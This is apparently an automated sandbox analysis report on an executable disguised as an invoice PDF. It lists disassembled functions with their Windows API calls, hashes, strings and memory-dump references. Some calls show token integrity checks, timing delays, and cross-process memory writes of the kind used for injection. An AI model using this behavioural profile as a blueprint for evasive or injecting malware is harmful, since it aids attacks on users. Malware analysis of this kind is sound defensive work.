Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 18d39f4f35d788565a69eccbb32a4c16798351e5bd8cd9fe340a28c4741db5af
Instruction ID: 2a8e50c9df9d9ed104c4451fdea57554a7bd7abfa23c90cdcfea427223f98d00
Opcode Fuzzy Hash: 18d39f4f35d788565a69eccbb32a4c16798351e5bd8cd9fe340a28c4741db5af
Instruction Fuzzy Hash: 7A01F97224560167F61267366E85D2F2659ABD27A97F5003FF825E2293EEFCCC01412C

Function 0047000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0046FF41,80070057,?,?,?,0047035E), ref: 0047002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0046FF41,80070057,?,?), ref: 00470046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0046FF41,80070057,?,?), ref: 00470054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0046FF41,80070057,?), ref: 00470064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0046FF41,80070057,?,?), ref: 00470070

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: e89e9185c9af94200255ca9a4afe8ad41df043aa060daf5fe0e1f4606f23c83a
Instruction ID: 23021f586f535801a659cad62ed450542fa43cbbbcdb01b6b7b344be3df9142e
Opcode Fuzzy Hash: e89e9185c9af94200255ca9a4afe8ad41df043aa060daf5fe0e1f4606f23c83a
Instruction Fuzzy Hash: D901A272601204FFDB505F68EC44BEA7EEDEF44762F148129F909D6210D779DD409BA4

Function 0047E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0047E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0047E9A5
Sleep.KERNEL32(00000000), ref: 0047E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0047E9B7
Sleep.KERNEL32 ref: 0047E9F3

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 2179a7372f7dbf06ae8ae120ef0d17ef4bee33749576cdcef1aed6ef2d0e4017
Instruction ID: f2088184f57336d844a909f770ddc2b3d6f329e7bd0d8ac59f20cd0a270141e8
Opcode Fuzzy Hash: 2179a7372f7dbf06ae8ae120ef0d17ef4bee33749576cdcef1aed6ef2d0e4017
Instruction Fuzzy Hash: BA01A1B2D01529DBCF409FE6DD886DDBB78FF0E300F004296D601B2241CB384551CB69

Function 004710F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00471114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00470B9B,?,?,?), ref: 00471120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00470B9B,?,?,?), ref: 0047112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00470B9B,?,?,?), ref: 00471136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0047114D

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 7f78811814a72b0c02fdbb5afd4f8e47da716614da87759c790437b700499d45
Instruction ID: 3f38b739c9eebb035901a3d6181a786c075046380bdc294c554717718219e434
Opcode Fuzzy Hash: 7f78811814a72b0c02fdbb5afd4f8e47da716614da87759c790437b700499d45
Instruction Fuzzy Hash: CC011D79200205BFDB514FA9DC89AAB3F6EEF8A360B504425FA46D7360DA31DD009E64

Function 00470FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00470FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00470FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00470FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00470FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00471002

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 2c84c71b5a7be7f69b4e30d5384410c2d2d18b4f021ee88ab878231e16aa690e
Instruction ID: b8981c4fdc8285d3277d01006d97029e100e31809b1bdea7f56964640f9af566
Opcode Fuzzy Hash: 2c84c71b5a7be7f69b4e30d5384410c2d2d18b4f021ee88ab878231e16aa690e
Instruction Fuzzy Hash: F2F0A975200301ABDB210FA89C89F973FADEF8A762F104825FA09D6260DE70DC408A64

Function 00471014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0047102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00471036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00471045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0047104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00471062

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: e20494f3a47d287b625f89700a330764807d549aeea3c630d1e7064eb03ff2b7
Instruction ID: 40e34e9eae8a88c544268f3db91f3f00edc97a0506d78080eabd363fde28ffe1
Opcode Fuzzy Hash: e20494f3a47d287b625f89700a330764807d549aeea3c630d1e7064eb03ff2b7
Instruction Fuzzy Hash: 0DF0A975200301ABDB211FA8EC88F973FADEF8A761F104425FA09E6260DE70D8408A64

Function 0048030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0048017D,?,004832FC,?,00000001,00452592,?), ref: 00480324
CloseHandle.KERNEL32(?,?,?,?,0048017D,?,004832FC,?,00000001,00452592,?), ref: 00480331
CloseHandle.KERNEL32(?,?,?,?,0048017D,?,004832FC,?,00000001,00452592,?), ref: 0048033E
CloseHandle.KERNEL32(?,?,?,?,0048017D,?,004832FC,?,00000001,00452592,?), ref: 0048034B
CloseHandle.KERNEL32(?,?,?,?,0048017D,?,004832FC,?,00000001,00452592,?), ref: 00480358
CloseHandle.KERNEL32(?,?,?,?,0048017D,?,004832FC,?,00000001,00452592,?), ref: 00480365

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: f34691dd8f73bd4e4db5348961348b5a9e62097038b719dd2a7259ee131cb3a4
Instruction ID: c32c7e71f5cdd539bc6d4072fb9e5749306e480631bf004e3a27d4ae3b5c44a9
Opcode Fuzzy Hash: f34691dd8f73bd4e4db5348961348b5a9e62097038b719dd2a7259ee131cb3a4
Instruction Fuzzy Hash: 1101DC72800B019FCB30AF66D88080BFBF9BE602053058E3FD19252A30C3B4A948CF84

Function 0044D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044D752

Part of subcall function 004429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0044D7D1,00000000,00000000,00000000,00000000,?,0044D7F8,00000000,00000007,00000000,?,0044DBF5,00000000), ref: 004429DE
Part of subcall function 004429C8: GetLastError.KERNEL32(00000000,?,0044D7D1,00000000,00000000,00000000,00000000,?,0044D7F8,00000000,00000007,00000000,?,0044DBF5,00000000,00000000), ref: 004429F0

_free.LIBCMT ref: 0044D764
_free.LIBCMT ref: 0044D776
_free.LIBCMT ref: 0044D788
_free.LIBCMT ref: 0044D79A

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 143f466ed7a907e6981e3a3d70175cf5e3502c2cea1d21b49757def193a6f240
Instruction ID: 14dbad4606ffe41d2f073dcaad61d9b2f57bc155d9c8a2c59d83fd0eab05b2ef
Opcode Fuzzy Hash: 143f466ed7a907e6981e3a3d70175cf5e3502c2cea1d21b49757def193a6f240
Instruction Fuzzy Hash: 16F012B2A45205ABA621FB66FAC5C177BDDBB44715BD40C1BF048D7601C778FC80866C

Function 00475C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00475C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00475C6F
MessageBeep.USER32(00000000), ref: 00475C87
KillTimer.USER32(?,0000040A), ref: 00475CA3
EndDialog.USER32(?,00000001), ref: 00475CBD

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: bb59ec5287a00e61e4ab1e5b9356a4277eba31e13a9486c6b36868533097a465
Instruction ID: 9a317d90fb9fe38d13e78c233653d40680c15c65805b64baaf6f06db39f602f6
Opcode Fuzzy Hash: bb59ec5287a00e61e4ab1e5b9356a4277eba31e13a9486c6b36868533097a465
Instruction Fuzzy Hash: F3018630500B04AFFB215B10DD8EFE67BB8BB01B05F04456AA587A50E1DBF4A9898A99

Function 004422A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004422BE

Part of subcall function 004429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0044D7D1,00000000,00000000,00000000,00000000,?,0044D7F8,00000000,00000007,00000000,?,0044DBF5,00000000), ref: 004429DE
Part of subcall function 004429C8: GetLastError.KERNEL32(00000000,?,0044D7D1,00000000,00000000,00000000,00000000,?,0044D7F8,00000000,00000007,00000000,?,0044DBF5,00000000,00000000), ref: 004429F0

_free.LIBCMT ref: 004422D0
_free.LIBCMT ref: 004422E3
_free.LIBCMT ref: 004422F4
_free.LIBCMT ref: 00442305

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bd1493f46af5fbeff70f7d3d265acb9415c9f2c44b8aa34cf693d3a80b904407
Instruction ID: ded007adef903f19d41836a550c5a512f8eca7a9e8d7194f03c9851f85b970ad
Opcode Fuzzy Hash: bd1493f46af5fbeff70f7d3d265acb9415c9f2c44b8aa34cf693d3a80b904407
Instruction Fuzzy Hash: DCF054F45411919BAA12BF56BDC180D3B64F718761780056BF410EA372C7F91452EFEC

Function 004295C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 004295D4
StrokeAndFillPath.GDI32(?,?,004671F7,00000000,?,?,?), ref: 004295F0
SelectObject.GDI32(?,00000000), ref: 00429603
DeleteObject.GDI32 ref: 00429616
StrokePath.GDI32(?), ref: 00429631

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 431a56af6126d74fb934f5478809107661f17544e590573119585be63491499a
Instruction ID: 95a409aef37bcee009baea42993923f6b71e8e16e567864d5747744f86aa7a26
Opcode Fuzzy Hash: 431a56af6126d74fb934f5478809107661f17544e590573119585be63491499a
Instruction Fuzzy Hash: 08F0AF7114A244EBDB164FA4ED8C7653FA1BB02322F408234F425591F3CB388991CF2C

Function 00440F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 004410F9
__freea.LIBCMT ref: 00441117

Part of subcall function 00441537: _free.LIBCMT ref: 0044154F

Strings

am/pm, xrefs: 0044117A
a/p, xrefs: 004411DE

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: ac29a15a75f5bae84f4bf38eaca9e3f7c03b467563d47b9fea527550e3e37074
Instruction ID: 0ceb46b2ee8850823f06aeb7929aa029d6cc207dcfd13acb96d393fe0527b033
Opcode Fuzzy Hash: ac29a15a75f5bae84f4bf38eaca9e3f7c03b467563d47b9fea527550e3e37074
Instruction Fuzzy Hash: 9BD1DE31A002069AFB249F68C845ABBB7B0FF05700F28415BE911ABB61D37D9DC1CB99

Function 004961D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 00430242: EnterCriticalSection.KERNEL32(004E070C,004E1884,?,?,0042198B,004E2518,?,?,?,004112F9,00000000), ref: 0043024D
Part of subcall function 00430242: LeaveCriticalSection.KERNEL32(004E070C,?,0042198B,004E2518,?,?,?,004112F9,00000000), ref: 0043028A

Part of subcall function 004300A3: __onexit.LIBCMT ref: 004300A9

__Init_thread_footer.LIBCMT ref: 00496238

Part of subcall function 004301F8: EnterCriticalSection.KERNEL32(004E070C,?,?,00428747,004E2514), ref: 00430202
Part of subcall function 004301F8: LeaveCriticalSection.KERNEL32(004E070C,?,00428747,004E2514), ref: 00430235

Part of subcall function 0048359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 004835E4
Part of subcall function 0048359C: LoadStringW.USER32(004E2390,?,00000FFF,?), ref: 0048360A

Strings

x#N, xrefs: 00496353
x#N, xrefs: 0049633A
x#N, xrefs: 0049636F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#N$x#N$x#N
API String ID: 1072379062-56826683
Opcode ID: 3523e2879c98f6aadde43e1f6727d58c05a92f84ef72ebaaf24ca8c4b1f5f7d7
Instruction ID: c9ba9791fd84f5f4aa6aa16194e221c61a93dfe8eef98ed134441fb040390de9
Opcode Fuzzy Hash: 3523e2879c98f6aadde43e1f6727d58c05a92f84ef72ebaaf24ca8c4b1f5f7d7
Instruction Fuzzy Hash: C3C17F71A00105AFCF14EF99D890EBEBBB9EF48314F12806EE9059B251D778ED45CB98

Function 00445AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

JOA, xrefs: 00445BA8, 00445C6C

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID: JOA
API String ID: 0-4101436360
Opcode ID: 87deaf03650484b5bfb456725a0e376c9996693db3396a84479cb781f0a7f70a
Instruction ID: 81db98df509d698b7c7209a264c5ff66790e7bc3a0b2e1f92e08d4c7083a60d6
Opcode Fuzzy Hash: 87deaf03650484b5bfb456725a0e376c9996693db3396a84479cb781f0a7f70a
Instruction Fuzzy Hash: 4151C171D006099FEF209FA5C885FAFBBB4EF09314F14005BF405A7293D6799902CB6A

Function 00448A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00448B6E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00448B7A
__dosmaperr.LIBCMT ref: 00448B81

Strings

.C, xrefs: 00448A63

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: .C
API String ID: 2434981716-1181961956
Opcode ID: b4b5be51b042283190a2174b5a85a689248d549f55c904eed8fcce7da5501a6a
Instruction ID: 876e3e89d12ec28d3a816206eda3b7418d01e9375f873fec0301dd9fe1d29aae
Opcode Fuzzy Hash: b4b5be51b042283190a2174b5a85a689248d549f55c904eed8fcce7da5501a6a
Instruction Fuzzy Hash: A5418E70604085AFFB249F24CC81A7E7FA5DB86304F2841AFF85497242DE799C53979C

Function 00472716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0047B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004721D0,?,?,00000034,00000800,?,00000034), ref: 0047B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00472760

Part of subcall function 0047B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0047B3F8

Part of subcall function 0047B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0047B355
Part of subcall function 0047B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00472194,00000034,?,?,00001004,00000000,00000000), ref: 0047B365
Part of subcall function 0047B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00472194,00000034,?,?,00001004,00000000,00000000), ref: 0047B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004727CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0047281A

Strings

@, xrefs: 00472832

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: e75cdcd01f02b8d1c994f5de6ad2e6fb2f374daa85f874f4d6fa5a51d1b83f7d
Instruction ID: ece7c4acca13ec0c699f4aa41f657afa398bf470d499fc4f00e7c5bbaa8e9516
Opcode Fuzzy Hash: e75cdcd01f02b8d1c994f5de6ad2e6fb2f374daa85f874f4d6fa5a51d1b83f7d
Instruction Fuzzy Hash: AB413072900218AFDB10DFA4CD41BDEBBB8EF05304F00819AFA59B7181DB756E85CB95

Function 0044172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Invoice No 1122207 pdf.exe,00000104), ref: 00441769
_free.LIBCMT ref: 00441834
_free.LIBCMT ref: 0044183E

Strings

C:\Users\user\Desktop\Invoice No 1122207 pdf.exe, xrefs: 00441760, 00441767, 00441796, 004417CE

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
